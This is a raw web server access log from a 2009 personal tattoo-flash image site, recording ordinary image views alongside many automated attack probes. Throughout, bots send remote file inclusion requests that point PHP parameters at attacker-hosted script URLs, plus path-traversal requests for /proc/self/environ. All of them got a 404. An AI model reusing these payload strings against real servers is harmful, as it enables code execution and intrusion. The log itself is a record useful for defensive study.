98.211.107.146 - - [04/Feb/2009:21:26:06 -0600] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:26:06 -0600] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:26:06 -0600] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:26:06 -0600] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
113.130.70.19 - - [04/Feb/2009:21:26:35 -0600] "GET /logs/access_log.1215216000/encapscms_PATH/core/core.php?root=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
113.130.70.19 - - [04/Feb/2009:21:26:46 -0600] "GET /logs/access_log.1214524800/encapscms_PATH/core/core.php?root=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
98.211.107.146 - - [04/Feb/2009:21:26:47 -0600] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:26:47 -0600] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:26:47 -0600] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
98.211.107.146 - - [04/Feb/2009:21:26:47 -0600] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
209.126.131.239 - - [04/Feb/2009:21:27:07 -0600] "GET /logs/access_log.1217721600//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
81.91.84.219 - - [04/Feb/2009:21:28:21 -0600] "GET /logs/access_log.1216684800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
81.91.84.219 - - [04/Feb/2009:21:28:22 -0600] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
81.91.84.219 - - [04/Feb/2009:21:28:22 -0600] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Feb/2009:21:28:27 -0600] "GET /logs/access_log.1219536000//admin/includes/spaw/spaw_control.class.php?spaw_root=http://sava-mebel.ru//assets/galleries/zeus1.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Feb/2009:21:28:27 -0600] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://sava-mebel.ru//assets/galleries/zeus1.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Feb/2009:21:28:28 -0600] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://sava-mebel.ru//assets/galleries/zeus1.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Feb/2009:21:28:47 -0600] "GET /logs/access_log.1218758400//admin/includes/spaw/spaw_control.class.php?spaw_root=http://sava-mebel.ru//assets/galleries/zeus1.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.805"
91.186.27.166 - - [04/Feb/2009:21:29:46 -0600] "GET /logs/access_log.1216080000//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
209.126.131.239 - - [04/Feb/2009:21:30:08 -0600] "GET /logs/access_log.1217635200//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
91.186.27.166 - - [04/Feb/2009:21:30:37 -0600] "GET /logs/access_log.1217721600//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
74.200.223.213 - - [04/Feb/2009:21:30:47 -0600] "GET /logs/access_log.1217376000/test.php?page=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.820"
74.200.223.213 - - [04/Feb/2009:21:30:47 -0600] "GET /test.php?page=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.820"
74.200.223.213 - - [04/Feb/2009:21:30:47 -0600] "GET /logs/test.php?page=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.820"
74.200.223.213 - - [04/Feb/2009:21:30:47 -0600] "GET /logs/access_log.1217462400/test.php?page=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.820"
88.191.95.106 - - [04/Feb/2009:21:30:58 -0600] "GET /logs/access_log.1216080000/htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
88.191.95.106 - - [04/Feb/2009:21:30:58 -0600] "GET /logs/access_log.1214179200/htmltonuke.php?filnavn=http://gumansin.com/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
91.186.27.166 - - [04/Feb/2009:21:30:59 -0600] "GET /logs/access_log.1213660800//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
81.91.84.219 - - [04/Feb/2009:21:31:10 -0600] "GET /logs/access_log.1219017600//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://203.114.112.155/webboard1234/mic.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
91.186.27.166 - - [04/Feb/2009:21:31:23 -0600] "GET /logs/access_log.1217635200//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
209.126.131.239 - - [04/Feb/2009:21:31:25 -0600] "GET /logs/access_log.1216080000//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
87.249.116.188 - - [04/Feb/2009:21:31:43 -0600] "GET /logs/access_log.1216080000//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
189.74.132.91 - - [04/Feb/2009:21:32:01 -0600] "GET /errors.php?error=http://gugakedu.co.kr/kboard/image/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
87.249.116.188 - - [04/Feb/2009:21:32:08 -0600] "GET /logs/access_log.1213660800//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
209.126.131.239 - - [04/Feb/2009:21:33:19 -0600] "GET /logs/access_log.1213660800//plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.pride-ug.ru/idrose.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
212.158.167.98 - - [04/Feb/2009:21:34:02 -0600] "GET /logs/access_log.1213660800//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hkcchoir.org.hk///upload/prety/sshell.xpp?? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
77.221.130.27 - - [04/Feb/2009:21:37:31 -0600] "GET /logs/index2.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
77.221.130.27 - - [04/Feb/2009:21:37:31 -0600] "GET /index2.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
113.130.70.19 - - [04/Feb/2009:21:38:04 -0600] "GET /logs/access_log.1214092800/encapscms_PATH/core/core.php?root=http://diegofire.t35.com/id01.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
216.58.238.85 - - [04/Feb/2009:21:41:17 -0600] "GET //RGboard/include/footer.php?_path[counter]=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
216.58.238.85 - - [04/Feb/2009:21:41:17 -0600] "GET /logs//RGboard/include/footer.php?_path[counter]=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
216.58.238.85 - - [04/Feb/2009:21:41:17 -0600] "GET /logs/access_log.1211328000//RGboard/include/footer.php?_path[counter]=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
216.58.238.85 - - [04/Feb/2009:21:41:22 -0600] "GET /logs/access_log.1213660800//RGboard/include/footer.php?_path[counter]=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
201.153.76.16 - - [04/Feb/2009:21:41:26 -0600] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3921 "http://images.google.com.mx/imgres?imgurl=http://tomdolan.pconline.com/tattoo/webring.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&usg=__8xDtV4NJiNCNR_vrV-IGhEHOMe4=&h=194&w=225&sz=13&hl=es&start=46&um=1&tbnid=fuQXIcqpCqKozM:&tbnh=93&tbnw=108&prev=/images%3Fq%3Dtattoo%2Bflash%2Bold%2Bschool%26start%3D40%26ndsp%3D20%26um%3D1%26hl%3Des%26sa%3DN""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5)"
201.153.76.16 - - [04/Feb/2009:21:41:28 -0600] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5)"
201.153.76.16 - - [04/Feb/2009:21:41:29 -0600] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5)"
80.172.224.171 - - [04/Feb/2009:21:42:05 -0600] "GET /logs/access_log.1211328000/RGboard/include/footer.php?_path[counter]=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 337 "-""libwww-perl/5.810"
80.172.224.171 - - [04/Feb/2009:21:42:05 -0600] "GET /RGboard/include/footer.php?_path[counter]=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
80.172.224.171 - - [04/Feb/2009:21:42:05 -0600] "GET /logs/RGboard/include/footer.php?_path[counter]=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
80.172.224.171 - - [04/Feb/2009:21:42:05 -0600] "GET /logs/access_log.1213660800/RGboard/include/footer.php?_path[counter]=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 337 "-""libwww-perl/5.810"
201.153.76.16 - - [04/Feb/2009:21:42:25 -0600] "GET /tattoo/set1.htm HTTP/1.1" 200 2645 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5)"
201.153.76.16 - - [04/Feb/2009:21:42:30 -0600] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5)"
201.153.76.16 - - [04/Feb/2009:21:42:33 -0600] "GET /tattoo/webring.jpg HTTP/1.1" 304 - "http://images.google.com.mx/imgres?imgurl=http://tomdolan.pconline.com/tattoo/webring.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&usg=__8xDtV4NJiNCNR_vrV-IGhEHOMe4=&h=194&w=225&sz=13&tbnid=fuQXIcqpCqKozM:&tbnh=93&tbnw=108&hl=es&um=1&prev=/images%3Fq%3Dtattoo%2Bflash%2Bold%2Bschool%26start%3D40%26ndsp%3D20%26um%3D1%26hl%3Des%26sa%3DN&frame=small""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB5)"
64.207.2.170 - - [04/Feb/2009:21:43:44 -0600] "GET /logs/includes/functions_portal.php?phpbb_root_path=http://www.richmondplaygroup.com/images/banners/id.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
64.207.2.170 - - [04/Feb/2009:21:43:45 -0600] "GET /includes/functions_portal.php?phpbb_root_path=http://www.richmondplaygroup.com/images/banners/id.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
216.58.238.85 - - [04/Feb/2009:21:44:27 -0600] "GET /logs/access_log.1211328000%20//RGboard/include/footer.php?_path[counter]=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
80.172.224.171 - - [04/Feb/2009:21:44:28 -0600] "GET /logs/access_log.1211328000%20/RGboard/include/footer.php?_path[counter]=http://www.animeaz.com/mambots/system/telor??? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
77.221.130.27 - - [04/Feb/2009:21:45:44 -0600] "GET /index1.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
77.221.130.27 - - [04/Feb/2009:21:45:44 -0600] "GET /logs/index1.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
200.13.253.154 - - [04/Feb/2009:21:45:59 -0600] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.hotelsunflower.it/includes/js/rhs/list.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.13.253.154 - - [04/Feb/2009:21:45:59 -0600] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://www.hotelsunflower.it/includes/js/rhs/list.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
77.221.130.27 - - [04/Feb/2009:21:47:32 -0600] "GET /logs/index1.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
77.221.130.27 - - [04/Feb/2009:21:47:32 -0600] "GET /index1.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
192.134.106.1 - - [04/Feb/2009:21:49:31 -0600] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
192.134.106.1 - - [04/Feb/2009:21:49:31 -0600] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 328 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.221.150.122 - - [04/Feb/2009:21:53:16 -0600] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ipching.org/vnc/fx29id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
77.221.150.122 - - [04/Feb/2009:21:53:16 -0600] "GET /logs/access_log.1227139200//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ipching.org/vnc/fx29id.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
77.221.150.122 - - [04/Feb/2009:21:53:16 -0600] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ipching.org/vnc/fx29id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
77.221.150.122 - - [04/Feb/2009:21:54:05 -0600] "GET /logs/access_log.1226016000//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.ipching.org/vnc/fx29id.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
64.246.18.35 - - [04/Feb/2009:21:57:03 -0600] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
64.246.18.35 - - [04/Feb/2009:21:57:04 -0600] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
192.134.106.1 - - [04/Feb/2009:21:57:45 -0600] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 346 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
192.134.106.1 - - [04/Feb/2009:21:57:50 -0600] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fvilardell.org/img/test.gif??? HTTP/1.1" 404 351 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
77.221.130.27 - - [04/Feb/2009:21:58:45 -0600] "GET /index.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
77.221.130.27 - - [04/Feb/2009:21:58:45 -0600] "GET /logs/index.php?pg=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
64.207.2.170 - - [04/Feb/2009:21:59:33 -0600] "GET /logs/access_log.1216512000/includes/functions_portal.php?phpbb_root_path=http://www.richmondplaygroup.com/images/banners/id.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
64.207.2.170 - - [04/Feb/2009:22:00:02 -0600] "GET /logs/access_log.1217203200/includes/functions_portal.php?phpbb_root_path=http://www.richmondplaygroup.com/images/banners/id.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Feb/2009:22:01:49 -0600] "GET /logs//index.php?abs_path=http://sava-mebel.ru//assets/galleries/zeus1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Feb/2009:22:01:49 -0600] "GET /logs/access_log.1218585600//index.php?abs_path=http://sava-mebel.ru//assets/galleries/zeus1.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Feb/2009:22:01:49 -0600] "GET //index.php?abs_path=http://sava-mebel.ru//assets/galleries/zeus1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
66.71.191.223 - - [04/Feb/2009:22:02:41 -0600] "GET /logs/access_log.1219449600//index.php/index.php?mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
66.71.191.223 - - [04/Feb/2009:22:02:41 -0600] "GET //index.php/index.php?mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
66.71.191.223 - - [04/Feb/2009:22:02:42 -0600] "GET /logs//index.php/index.php?mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
71.106.78.231 - - [04/Feb/2009:22:04:02 -0600] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3921 "http://www.google.com/search?q=tattoo+flash+vintage&sourceid=navclient-ff&ie=UTF-8&rlz=1B3GGGL_enUS246US298""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:02 -0600] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:03 -0600] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:05 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:08 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:11 -0600] "GET /tattoo/set1.htm HTTP/1.1" 200 2645 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:11 -0600] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:11 -0600] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:11 -0600] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:11 -0600] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:11 -0600] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:11 -0600] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:11 -0600] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:11 -0600] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:11 -0600] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:12 -0600] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:23 -0600] "GET /tattoo/set2.htm HTTP/1.1" 200 2286 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:23 -0600] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:23 -0600] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:23 -0600] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
71.106.78.231 - - [04/Feb/2009:22:04:23 -0600] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5"
